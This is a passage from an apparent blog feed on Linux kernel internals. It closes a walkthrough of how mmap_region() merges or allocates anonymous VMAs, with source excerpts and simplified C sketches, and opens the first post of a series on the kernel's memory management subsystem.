</span></span><span class="line"><span class="cl">	<span class="n">prev</span> <span class="o">=</span> <span class="nf">vma_prev</span><span class="p">(</span><span class="o">&amp;</span><span class="n">vmi</span><span class="p">);</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></p>
<p>Next, the iterator is used to fetch the first vma from where the iterator starts (i.e. the next vma after <code>addr</code>) and the first vma prior to where the iterator starts (i.e. the first vma before <code>addr</code>). <code>mmap_region()</code> will then check the following cases:</p>
<ul>
<li>Can we merge the new mapping with the <code>next</code> vma instead of creating a new <code>vma</code>?</li>
<li>Can we merge the new OR merged mapping with the <code>prev</code> vma?</li>
<li>Some mappings, denoted by <code>VM_SPECIAL</code>, can&rsquo;t be merged.</li>
<li>If no merging is possible, allocate a new <code>vma</code>, initialise it and insert it into the <code>mm-&gt;mm_mt</code></li>
</ul>
<h4 id="vma-merging">VMA Merging</h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">	/* Attempt to expand an old mapping */
</span></span><span class="line"><span class="cl">	/* Check next */
</span></span><span class="line"><span class="cl">	if (next &amp;&amp; next-&gt;vm_start == end &amp;&amp; !vma_policy(next) &amp;&amp;
</span></span><span class="line"><span class="cl">	    can_vma_merge_before(next, vm_flags, NULL, file, pgoff+pglen,
</span></span><span class="line"><span class="cl">				 NULL_VM_UFFD_CTX, NULL)) {
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></p>
<p>A few things need to be checked to determine if we can expand an existing vma, instead of allocating a new <code>struct vm_area_struct</code> for our new mapping.</p>
<p>Let&rsquo;s look at the first case: can we merge the new mapping with the <code>next</code> vma? First, there needs to be a <code>next</code> mapping and it needs to be adjacent to where our new mapping would go (i.e. the end of our new mapping is the start of <code>next</code>).</p>
<p>Then <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L765"><code>!vma_policy(next)</code></a> makes sure <code>next</code> doesn&rsquo;t have its own specific NUMA policy (memory stuff, stored in <code>vma-&gt;vm_policy</code>). Finally <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L813"><code>can_vma_merge_before()</code></a> carries out the remaining checks, which basically involve:</p>
<ul>
<li>Checking if the <code>vm_flags</code>, <code>file</code> etc. are compatible. Also, if it has its own <code>vma-&gt;vm_ops-&gt;close</code> to be called when the vma is closed, it won&rsquo;t be merged.</li>
<li>If <code>next</code> is an anonymous vma cloned from a parent process, it won&rsquo;t be merged.</li>
</ul>
<p>If these checks are passed, <code>next</code> will be expanded to include our new mapping. Either way, similar checks will then be made for <code>prev</code>. If those checks pass, either:</p>
<ul>
<li><code>next</code> didn&rsquo;t merge, in which case we&rsquo;ll expand <code>prev</code> to include the new mapping</li>
<li><code>next</code> did merge, in which case <code>prev</code> will be expanded to include the new mapping AND <code>next</code>.</li>
</ul>
<p>If these checks fail a vma will be allocated for our new mapping.</p>
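<p>The decision tree above can be sketched roughly as follows. This is a toy model under some big assumptions: it only compares adjacency, flags and <code>pgoff</code> continuity, and ignores files, NUMA policy, <code>vm_ops-&gt;close</code>, anon_vma and userfaultfd. <code>struct vma_sketch</code>, <code>enum merge_result</code> and the helper names are all made up for illustration.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdbool.h&gt;
#include &lt;stddef.h&gt;

#define PAGE_SHIFT	12	/* 4 KiB pages on x86_64 */

/* Hypothetical, heavily trimmed stand-in for struct vm_area_struct. */
struct vma_sketch {
	unsigned long start, end;	/* covers [start, end) */
	unsigned long flags;
	unsigned long pgoff;
};

enum merge_result { MERGE_NONE, MERGE_NEXT, MERGE_PREV, MERGE_BOTH };

/* The new mapping must end exactly where next begins. */
static bool can_merge_next(const struct vma_sketch *next, unsigned long end,
			   unsigned long flags, unsigned long end_pgoff)
{
	return next &amp;&amp; next-&gt;start == end &amp;&amp; next-&gt;flags == flags &amp;&amp;
	       next-&gt;pgoff == end_pgoff;
}

/* The new mapping must start exactly where prev ends. */
static bool can_merge_prev(const struct vma_sketch *prev, unsigned long addr,
			   unsigned long flags, unsigned long pgoff)
{
	return prev &amp;&amp; prev-&gt;end == addr &amp;&amp; prev-&gt;flags == flags &amp;&amp;
	       prev-&gt;pgoff + ((prev-&gt;end - prev-&gt;start) &gt;&gt; PAGE_SHIFT) == pgoff;
}

enum merge_result sketch_merge(const struct vma_sketch *prev,
			       const struct vma_sketch *next,
			       unsigned long addr, unsigned long len,
			       unsigned long flags, unsigned long pgoff)
{
	unsigned long end = addr + len;
	bool with_next = can_merge_next(next, end, flags,
					pgoff + (len &gt;&gt; PAGE_SHIFT));
	bool with_prev = can_merge_prev(prev, addr, flags, pgoff);

	if (with_next &amp;&amp; with_prev)
		return MERGE_BOTH;	/* prev grows over the new range AND next */
	if (with_prev)
		return MERGE_PREV;
	if (with_next)
		return MERGE_NEXT;
	return MERGE_NONE;		/* time to allocate a new vma */
}
</code></pre></div><p>Note how the <code>pgoff</code> comparison comes for free with anonymous mappings: since <code>pgoff = addr &gt;&gt; PAGE_SHIFT</code>, two adjacent anonymous vmas will normally have contiguous offsets.</p>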
<h4 id="vma-allocation">VMA Allocation</h4>
<p><img src="https://sam4k.com/content/images/2025/04/lonely.gif" alt=""></p>
<p>So, there&rsquo;s no one for our mapping to merge with. In this case, a new vma will be allocated, initialised and inserted into the <code>mm-&gt;mm_mt</code> tree:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl">	<span class="n">vma</span> <span class="o">=</span> <span class="nf">vm_area_alloc</span><span class="p">(</span><span class="n">mm</span><span class="p">);</span>                           <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="nf">vma_iter_config</span><span class="p">(</span><span class="o">&amp;</span><span class="n">vmi</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">end</span><span class="p">);</span>                  <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="nf">vma_set_range</span><span class="p">(</span><span class="n">vma</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">end</span><span class="p">,</span> <span class="n">pgoff</span><span class="p">);</span>              <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="nf">vm_flags_init</span><span class="p">(</span><span class="n">vma</span><span class="p">,</span> <span class="n">vm_flags</span><span class="p">);</span>                      <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_page_prot</span> <span class="o">=</span> <span class="nf">vm_get_page_prot</span><span class="p">(</span><span class="n">vm_flags</span><span class="p">);</span>    <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">file</span><span class="p">)</span> <span class="p">{</span>                                        <span class="p">[</span><span class="mi">5</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">	<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">vm_flags</span> <span class="o">&amp;</span> <span class="n">VM_SHARED</span><span class="p">)</span> <span class="p">{</span>                 <span class="p">[</span><span class="mi">6</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>                                           <span class="p">[</span><span class="mi">7</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="nf">vma_set_anonymous</span><span class="p">(</span><span class="n">vma</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="nf">map_deny_write_exec</span><span class="p">(</span><span class="n">vma</span><span class="p">,</span> <span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_flags</span><span class="p">))</span> <span class="p">{</span>     <span class="p">[</span><span class="mi">8</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="n">error</span> <span class="o">=</span> <span class="o">-</span><span class="n">EACCES</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">close_and_free_vma</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="cm">/* Allow architectures to sanity-check the vm_flags */</span>
</span></span><span class="line"><span class="cl">	<span class="n">error</span> <span class="o">=</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">arch_validate_flags</span><span class="p">(</span><span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_flags</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">close_and_free_vma</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">error</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="nf">vma_iter_prealloc</span><span class="p">(</span><span class="o">&amp;</span><span class="n">vmi</span><span class="p">,</span> <span class="n">vma</span><span class="p">))</span>                  <span class="p">[</span><span class="mi">9</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">close_and_free_vma</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="cm">/* Lock the VMA since it is modified after insertion into VMA tree */</span>
</span></span><span class="line"><span class="cl">	<span class="nf">vma_start_write</span><span class="p">(</span><span class="n">vma</span><span class="p">);</span>                              <span class="p">[</span><span class="mi">10</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="nf">vma_iter_store</span><span class="p">(</span><span class="o">&amp;</span><span class="n">vmi</span><span class="p">,</span> <span class="n">vma</span><span class="p">);</span>                         <span class="p">[</span><span class="mi">11</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="n">mm</span><span class="o">-&gt;</span><span class="n">map_count</span><span class="o">++</span><span class="p">;</span>                                   <span class="p">[</span><span class="mi">12</span><span class="p">]</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></p>
<p>Most of this is fairly straightforward: we allocate a new <code>struct vm_area_struct</code> [0], update the iterator [1], update the <code>vma</code> start/end/pgoff [2], its flags and protections [3][4].</p>
<p>Next, there&rsquo;s some mapping type specific initialisation depending on if it&rsquo;s a file-backed [5], shared anonymous [6] or private anonymous mapping [7]. In this case, <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L909"><code>vma_set_anonymous()</code></a> simply sets <code>vma-&gt;vm_ops = NULL</code>. This field being NULL is what marks it as a (private) anonymous vma (as seen by the equivalent <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L914"><code>vma_is_anonymous()</code></a> check).</p>
<p>There is then a security check [8], <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mman.h#L192"><code>map_deny_write_exec()</code></a>, which will prevent the creation of a mapping with write and execute permissions if the <code>mm</code> has the <code>MMF_HAS_MDWE</code> flag set (note a similar check is also done by selinux via the <code>mmap_file</code> hook).</p>
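<p>Here&rsquo;s a rough model of that check as I understand it from the 6.11.5 source. It&rsquo;s a sketch, not the kernel code: the <code>has_mdwe</code> parameter stands in for the <code>MMF_HAS_MDWE</code> bit on the <code>mm</code>, the <code>VM_*</code> values are copied by hand, and the function name is mine.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdbool.h&gt;

/* Bit values mirrored from include/linux/mm.h (assumed, not included). */
#define VM_WRITE	0x2UL
#define VM_EXEC		0x4UL

/*
 * has_mdwe models the MMF_HAS_MDWE bit; old_flags are the vma's current
 * flags and new_flags the ones being requested. Returns true to deny.
 */
bool sketch_deny_write_exec(bool has_mdwe, unsigned long old_flags,
			    unsigned long new_flags)
{
	if (!has_mdwe)
		return false;
	/* Never allow writable and executable at the same time. */
	if ((new_flags &amp; VM_EXEC) &amp;&amp; (new_flags &amp; VM_WRITE))
		return true;
	/* Don't let a non-executable mapping become executable later. */
	if (!(old_flags &amp; VM_EXEC) &amp;&amp; (new_flags &amp; VM_EXEC))
		return true;
	return false;
}
</code></pre></div><p>In <code>mmap_region()</code> the vma&rsquo;s own flags are passed in as the requested flags, so only the first rule can fire here; the second one matters for later permission changes such as <code>mprotect()</code>.</p>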
<p>Finally, our <code>vma</code> is ready to be inserted into the <code>mm-&gt;mm_mt</code>. This is done by first preallocating enough nodes for the insertion (store) [9].</p>
<p>Then, if <code>CONFIG_PER_VMA_LOCK=y</code>, the per-vma write lock will be taken [10], which acts as a r/w semaphore in practice. This is interesting, because you might notice there is no subsequent unlock to pair with <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L740"><code>vma_start_write()</code></a>. That&rsquo;s because all vma write locks are unlocked automatically when the mmap write lock is released, <a href="https://docs.kernel.org/mm/process_addrs.html#locking">read more here</a>.</p>
<p>Finally our new mapping is inserted into the <code>mm-&gt;mm_mt</code> tree via the iterator [11], using <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/internal.h#L1437"><code>vma_iter_store()</code></a>, and the process&rsquo;s total mapping count is updated [12].</p>
<h3 id="final-bits">Final Bits</h3>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl">	<span class="nf">vm_stat_account</span><span class="p">(</span><span class="n">mm</span><span class="p">,</span> <span class="n">vm_flags</span><span class="p">,</span> <span class="n">len</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">	<span class="cm">/*
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * New (or expanded) vma always get soft dirty status.
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * Otherwise user-space soft-dirty page tracker won&#39;t
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * be able to distinguish situation when vma area unmapped,
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * then new mapped in-place (which must be aimed as
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * a completely new data area).
</span></span></span><span class="line"><span class="cl"><span class="cm">	 */</span>
</span></span><span class="line"><span class="cl">	<span class="nf">vm_flags_set</span><span class="p">(</span><span class="n">vma</span><span class="p">,</span> <span class="n">VM_SOFTDIRTY</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="nf">vma_set_page_prot</span><span class="p">(</span><span class="n">vma</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="nf">validate_mm</span><span class="p">(</span><span class="n">mm</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></p>
<p>There&rsquo;s some bits we&rsquo;ve skipped related to files or huge pages, but eventually we&rsquo;ll get here to the end of the function (we&rsquo;re almost there!!). So what&rsquo;s left to do?</p>
<p>Some accounting of course! <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L3612"><code>vm_stat_account()</code></a> updates various <code>mm</code> stat fields tracking the types of mappings, including: <code>mm-&gt;total_vm</code> (total pages), <code>mm-&gt;exec_vm</code>, <code>mm-&gt;stack_vm</code> and <code>mm-&gt;data_vm</code> (private, writable, not stack).</p>
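<p>To illustrate how a mapping gets sorted into one of those buckets, here&rsquo;s a small sketch based on my reading of the 6.11.5 source. The <code>VM_*</code> values are copied by hand (with <code>VM_STACK</code> assumed to be <code>VM_GROWSDOWN</code>, as on x86_64), and <code>struct mm_stats_sketch</code> is a made-up stand-in for the relevant <code>mm_struct</code> fields.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">/* Bit values mirrored from include/linux/mm.h (assumed, not included). */
#define VM_WRITE	0x00000002UL
#define VM_EXEC		0x00000004UL
#define VM_SHARED	0x00000008UL
#define VM_STACK	0x00000100UL	/* VM_GROWSDOWN on x86_64 */

/* Hypothetical stand-in for the mm_struct counters, all in pages. */
struct mm_stats_sketch {
	unsigned long total_vm, exec_vm, stack_vm, data_vm;
};

void sketch_vm_stat_account(struct mm_stats_sketch *mm, unsigned long flags,
			    long npages)
{
	/* Every mapping counts towards the total. */
	mm-&gt;total_vm += npages;

	if ((flags &amp; (VM_EXEC | VM_WRITE | VM_STACK)) == VM_EXEC)
		mm-&gt;exec_vm += npages;	/* executable, not writable, not stack */
	else if ((flags &amp; VM_STACK) == VM_STACK)
		mm-&gt;stack_vm += npages;
	else if ((flags &amp; (VM_WRITE | VM_SHARED | VM_STACK)) == VM_WRITE)
		mm-&gt;data_vm += npages;	/* private, writable, not stack */
}
</code></pre></div><p>For our case study, <code>vm_flags</code> is <code>115</code> (<code>0x73</code>) and <code>len &gt;&gt; PAGE_SHIFT</code> is <code>1</code>, so in this model both <code>total_vm</code> and <code>data_vm</code> go up by one page.</p>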
<p>Now, regardless of whether this is a new or expanded vma, the <code>VM_SOFTDIRTY</code> flag is set. Dirty is memory management speak for &ldquo;this has been modified btw!&rdquo;. Typically this is in the context of changes to a file in memory that aren&rsquo;t written to disk yet. Here, if <code>CONFIG_MEM_SOFT_DIRTY=y</code>, this bit is set to indicate that the vma has been modified (as I understand it, the &ldquo;soft&rdquo; part means it doesn&rsquo;t require immediate action by the kernel, but will be checked when the next relevant action is taken). We&rsquo;ll touch more on what these &ldquo;actions&rdquo; are in the next section when we cover paging.</p>
<p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L90"><code>vma_set_page_prot()</code></a> will update <code>vma-&gt;vm_page_prot</code> to reflect <code>vma-&gt;vm_flags</code>. Next is <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L322"><code>validate_mm()</code></a>, which is a debugging function that validates the state of the memory mappings. This is only enabled on debug builds with <code>CONFIG_DEBUG_VM_MAPLE_TREE=y</code>.</p>
<p>And last, but not least, we return the <code>addr</code> of our new mapping, which will propagate back, if all is valid, to the return value of the userspace <code>mmap()</code> call.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">#0  mmap_region (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=140379443372032, len=len@entry=4096, vm_flags=vm_flags@entry=115, 
</span></span><span class="line"><span class="cl">    pgoff=pgoff@entry=34272325042, uf=uf@entry=0xffffc900006bbef0) at mm/mmap.c:2852
</span></span><span class="line"><span class="cl">#1  0xffffffff81247544 in do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=140379443372032, addr@entry=0, len=len@entry=4096, 
</span></span><span class="line"><span class="cl">    prot=&lt;optimized out&gt;, prot@entry=3, flags=flags@entry=34, vm_flags=&lt;optimized out&gt;, vm_flags@entry=0, pgoff=&lt;optimized out&gt;, 
</span></span><span class="line"><span class="cl">    populate=0xffffc900006bbee8, uf=0xffffc900006bbef0) at mm/mmap.c:1468
</span></span><span class="line"><span class="cl">#2  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
</span></span><span class="line"><span class="cl">#3  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc900006bbf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:52
</span></span><span class="line"><span class="cl">#4  do_syscall_64 (regs=0xffffc900006bbf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:83
</span></span><span class="line"><span class="cl">#5  0xffffffff82000130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121
</span></span></code></pre></div><p>Not much happens when we return back to <code>do_mmap()</code>, other than deciding how many pages, if any, need to be populated, before returning to <code>vm_mmap_pgoff()</code>. This function will then drop the mmap write lock and do any relevant userfaultfd and population bits.</p>
<p>Although out of scope, populating a mapping essentially involves doing what we&rsquo;re going to cover in the next section (writing to memory) now, instead of waiting to access it.</p>
<p>Then we&rsquo;re pretty much back in userspace, with a shiny new (or merged) mapping!</p>
<h3 id="summary">Summary</h3>
<p><img src="https://sam4k.com/content/images/2025/04/confused.gif" alt=""></p>
<p>It&rsquo;s only been, uh, 6000 words or so but just like that we&rsquo;ve covered this line of code:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
</span></span></code></pre></div><p>We did a whistle-stop (?!) tour of the <code>mmap()</code> system call, focusing on how private, anonymous mappings are created and managed by the kernel.</p>
<p>We got some first hand experience of how the <code>struct mm_struct</code> helps manage a process&rsquo;s memory, including the <code>mm-&gt;mm_mt</code> tree which tracks the memory areas within the process&rsquo;s virtual address space, which are represented by <code>struct vm_area_struct</code>.</p>
<p>We also dived into some implementation details, covering some of the security mechanisms and checks, how unused addresses for new mappings are found and the different cases that need to be considered when mapping a new region.</p>
<hr>
<ol>
<li>If you&rsquo;re curious why <code>mmap_min_addr</code> is a thing, this mitigation was added way back in 2009 for 2.X kernels. For context then, <a href="https://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html">check out this post from 2009</a> on bypassing it. For a bonus, there was <a href="https://googleprojectzero.blogspot.com/2023/01/exploiting-null-dereferences-in-linux.html">a semi recent P0 post</a> about modern NULL ptr deref exploitation.</li>
<li><a href="https://www.kernel.org/doc/html/next/userspace-api/mseal.html">https://www.kernel.org/doc/html/next/userspace-api/mseal.html</a></li>
</ol>
<h2 id="next-time">Next Time</h2>
<p><img src="https://sam4k.com/content/images/2025/04/weary_pc.gif" alt=""></p>
<p>Wow, I may have got a bit lost in the sauce for this one (sorry)&hellip; Hopefully this is useful for someone. This time we covered the first portion of our simple program: mapping memory. Next time, we&rsquo;ll move onto writing to memory. Buckle up, as that&rsquo;ll involve a deep dive into how the kernel does all things (*specifically pertaining to our case study) paging, starting with page faults and going from there (wish me luck).</p>
<p>That said, I think my next post might be more exploitation focused, both for my own sanity after this 6000 word linternals dump and also as it&rsquo;s been a while since I published some security stuff. Anyways, like I said, I&rsquo;m hoping this post bordered more on the &ldquo;in depth but verbose walkthrough of linux internals&rdquo; and not &ldquo;mad ramblings of someone who overcommitted to an ambitious series&rdquo;.</p>
<p>As always feel free to @me (on <a href="https://twitter.com/sam4k1">X</a>, <a href="https://bsky.app/profile/sam4k.com">Bluesky</a> or less commonly used <a href="https://infosec.exchange/@sam4k">Mastodon</a>) if you have any questions, suggestions or corrections :)</p>
]]></content:encoded></item><item><title>Linternals: Exploring The mm Subsystem via mmap [0x01]</title><description>In this series we&amp;#39;ll explore the Linux kernel&amp;#39;s memory management subsystem, using a simple userspace program as our starting point.</description><link>https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/</link><guid isPermaLink="false">67010c30de619fc1154ef57d</guid><category>linux</category><category>kernel</category><category>memory</category><dc:creator>sam4k</dc:creator><pubDate>Mon, 16 Dec 2024 14:00:01 +0000</pubDate><media:content url="https://sam4k.com/content/images/2024/10/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>That&rsquo;s right, you&rsquo;re not hallucinating, Linternals is back! It&rsquo;s been a <em>while</em>, I know, but after some travelling and moving to a new role, I&rsquo;ve finally found some time to ramble.</p>
<p>For those of you unfamiliar with the series (or who have understandably forgotten that it existed), I&rsquo;ve covered several topics relating to kernel memory management previously:</p>
<ul>
<li><a href="https://sam4k.com/linternals/#virtual-memory">The &ldquo;Virtual Memory&rdquo; series</a> of posts discusses the differences between physical and virtual memory, exploring both the user and kernel virtual address spaces</li>
<li><a href="https://sam4k.com/linternals/#memory-allocators">The series on &ldquo;Memory Allocators&rdquo;</a> covers the role of memory allocators in general before moving on to detailing the kernel&rsquo;s page and slab allocators</li>
</ul>
<p>This post might be a little different, as I&rsquo;m writing this introduction before I&rsquo;ve actually planned 100% what I&rsquo;ll be writing about. I know I want to explore the memory management (mm) subsystem in more detail, building on what we&rsquo;ve covered so far, but the issue is&hellip;</p>
<p><img src="https://sam4k.com/content/images/2024/12/idk_where_to_begin.gif" alt=""></p>
<p>There&rsquo;s a LOT to this subsystem, it&rsquo;s integral to the kernel and interacts with lots of other components. This had me thinking - how do I cover this gargantuan, messy topic in a structured and accessible way?! Where do I begin?? What do I cover???</p>
<p>My plan is to take a leaf out of how I would normally approach researching a new topic like this: start with a high level action (e.g. what the user sees) and follow the source, building up an understanding of the relevant structures and API as we go.</p>
<p>So we&rsquo;ll take a simple action - mapping and writing to some (anonymous) memory in userspace - and see how deep we can go into the kernel, exploring what is actually going on under the hood. <em>Hopefully</em> this will provide an interesting and informative read, giving some insights on some of the key structures and functions of the kernel&rsquo;s mm subsystem.</p>
<p>🐧</p>
<p>This post is based on the latest kernel at the time of writing, 6.11.5, and x86_64.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#what-is-memory-management">What is Memory Management?</a></li>
<li><a href="#overview-of-the-mm-subsystem">Overview of The MM Subsystem</a>
<ul>
<li><a href="#representing-memory">Representing Memory</a></li>
<li><a href="#allocating-memory">Allocating Memory</a></li>
<li><a href="#mapping-memory">Mapping Memory</a></li>
<li><a href="#managing-memory">Managing Memory</a></li>
</ul>
</li>
<li><a href="#getting-lost-in-the-source">Getting Lost in The Source</a></li>
<li><a href="#mapping-memory-1">Mapping Memory</a>
<ul>
<li><a href="#entering-the-kernel">Entering The Kernel</a></li>
<li><a href="#x64sysmmap"><code>__x64_sys_mmap()</code></a></li>
<li><a href="#ksysmmappgoff"><code>ksys_mmap_pgoff()</code></a></li>
<li><a href="#vmmmappgoff"><code>vm_mmap_pgoff()</code></a>
<ul>
<li><a href="#fetching-our-mmstruct">Fetching Our <code>mm_struct</code></a></li>
<li><a href="#a-bit-of-security">A Bit Of Security</a></li>
<li><a href="#locking">Locking</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#next-time">Next Time</a></li>
</ul>
<h2 id="what-is-memory-management">What is Memory Management?</h2>
<p>So before we get stuck into the nitty-gritty details, let&rsquo;s talk about what we mean by memory management. Fortunately, unlike some of the topics we&rsquo;ve covered (I&rsquo;m looking at you SLUB), this one&rsquo;s fairly self explanatory: it&rsquo;s about managing a system&rsquo;s memory.</p>
<p><img src="https://sam4k.com/content/images/2024/12/lets_break_it_down.gif" alt=""></p>
<p>Memory, in this sense, covers the range of storage a modern system may use: HDDs and SSDs, RAM, CPU registers and caches etc. Managing this involves providing representations of the various types of memory and means for the kernel and userspace to efficiently access and utilise them.</p>
<p>Let&rsquo;s take the everyday (and oversimplified) example of running a program on our computer. We can see involvement of memory management every step of the way:</p>
<ul>
<li>First, the program itself is stored on disk and must be read</li>
<li>It is then loaded into RAM, where the physical address in memory is mapped into our process&rsquo; virtual address space; commonly loaded data will make use of caches</li>
<li>We&rsquo;ve talked about how the kernel and userspace have their own virtual address spaces, with their own mappings and protections which need to be managed</li>
<li>Then we have the execution of the code itself, which will make use of various CPU registers. It will also need to ask the kernel to do privileged things via system calls, so we also need to consider the transition between userspace and the kernel!</li>
</ul>
<p>Hopefully this highlights how fundamental the memory management subsystem is and gives a glimpse at its many responsibilities.</p>
<h2 id="overview-of-the-mm-subsystem">Overview of The MM Subsystem</h2>
<p><img src="https://sam4k.com/content/images/2024/12/tell_me_more.gif" alt=""></p>
<p>Okay, what does this <em>actually</em> look like? The kernel has several <a href="https://docs.kernel.org/subsystem-apis.html">core subsystems</a>, one of which is the <a href="https://docs.kernel.org/mm/index.html">memory management subsystem</a>. Looking at the kernel source tree, this is located in the aptly named <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm"><code>mm/</code></a> subdirectory.</p>
<p>I figured we could highlight some of the key files in there to give a sense of the subsystem&rsquo;s role and structure in a more tangible context. Like many of my decisions, this turned out to be harder than I thought, but we&rsquo;ll give it a go.</p>
<h3 id="representing-memory">Representing Memory</h3>
<p>To be able to manage memory, we need to be able to represent it in a way the kernel can work with. There are a number of key structures used by the <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm"><code>mm/</code></a> subsystem, many of which can be found in <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h">include/linux/mm_types.h</a>. This includes:</p>
<ul>
<li>Representations for chunks of physically contiguous memory (<a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L72"><code>struct page</code></a>) and the tables used to organise how this memory is accessed.</li>
